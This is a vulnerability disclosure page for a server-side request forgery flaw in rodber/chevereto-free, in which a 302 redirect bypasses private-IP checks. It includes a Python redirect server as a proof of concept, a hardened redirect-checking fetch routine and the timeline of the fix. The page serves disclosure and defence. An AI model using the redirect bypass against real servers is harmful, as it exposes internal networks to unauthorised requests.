Server-Side Request Forgery (SSRF) in rodber/chevereto-free


Reported on Dec 30th 2021


There was some hardening done previously against private IP addresses in the SSRF vulnerability I disclosed in the previous report. However, the checks can be bypassed by URL redirection.

Proof of Concept

If the URL resolves to a public IP address, it will pass the isValidUrl check. If that same URL then redirects to a private IP address by serving a 302 response, passing it to curl_exec will cause curl_exec to query the private address instead, because CURLOPT_SETLOCATION is set to 1, which tells curl to follow redirects.

A redirector for testing can be set up like this:

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv) - 1 != 2:
    print("Usage: {} <port_number> <url>".format(sys.argv[0]))
    sys.exit(1)  # without this the script falls through and crashes on sys.argv[1]

class Redirect(BaseHTTPRequestHandler):
    """Answer every GET with a 302 pointing at the URL given on the command line."""
    def do_GET(self):
        self.send_response(302)                    # status line must precede the headers
        self.send_header('Location', sys.argv[2])
        self.end_headers()                         # terminates the header block so the client sees the redirect

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()

Usage: python [port] [redirect_url]


This vulnerability is capable of SSRF (the server makes requests to the internal network).



Redirection should be disabled for file_get_contents too.
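A hardened fetch pattern covering both points above (the 302 bypass of the one-time check, and the note that file_get_contents should not follow redirects either), added here as an example and not Chevereto's code: automatic redirect following is switched off, and every Location hop is re-validated against private, loopback, link-local and reserved ranges before the next request is issued. resolve_all, validate_url, fetch_with_checked_redirects and the injectable fetch/resolver callables are assumed helper names; validate_url stands in for the page's isValidUrl check.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlparse

MAX_REDIRECTS = 5
REDIRECT_CODES = (301, 302, 303, 307, 308)

def resolve_all(host):
    """Default resolver (assumed helper): every address the host resolves to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_public_address(ip_text):
    """True only for globally routable unicast addresses.
    Note: Python's ipaddress also flags documentation ranges (e.g. 203.0.113.0/24)
    as private, which is the conservative behaviour we want here."""
    ip = ipaddress.ip_address(ip_text)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified)

def validate_url(url, resolver=resolve_all):
    """Accept http(s) URLs whose host resolves only to public addresses."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        addrs = resolver(parts.hostname)
        return bool(addrs) and all(is_public_address(a) for a in addrs)
    except (socket.gaierror, ValueError):
        return False

def fetch_with_checked_redirects(url, fetch, resolver=resolve_all,
                                 max_redirects=MAX_REDIRECTS):
    """Follow redirects manually, re-validating every hop.

    fetch(url) must return (status, headers, body) WITHOUT following redirects
    itself (for curl that means CURLOPT_FOLLOWLOCATION left at 0). Returns
    (final_url, body) or raises ValueError when a hop is blocked.
    Caveat: checking the resolved address here and letting fetch() resolve the
    name again leaves a DNS-rebinding window; pin the checked IP inside fetch()
    to close it.
    """
    for _ in range(max_redirects + 1):
        if not validate_url(url, resolver):
            raise ValueError("blocked by SSRF policy: " + url)
        status, headers, body = fetch(url)
        if status not in REDIRECT_CODES:
            return url, body
        # Location may be relative; resolve it against the current URL first.
        url = urljoin(url, headers.get("Location", ""))
    raise ValueError("too many redirects")
```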

We are processing your report and will contact the rodber/chevereto-free team within 24 hours. a month ago
haxatron modified their report a month ago
haxatron submitted a a month ago
We have contacted a member of the rodber/chevereto-free team and are waiting to hear back a month ago
We have sent a follow up to the rodber/chevereto-free team. We will try again in 7 days. 25 days ago
Rodolfo Berrios validated this vulnerability 21 days ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Rodolfo Berrios confirmed that a fix has been merged on 586031 21 days ago
haxatron has been awarded the fix bounty
functions.php#L1651 has been validated
functions.php#L1691L1693 has been validated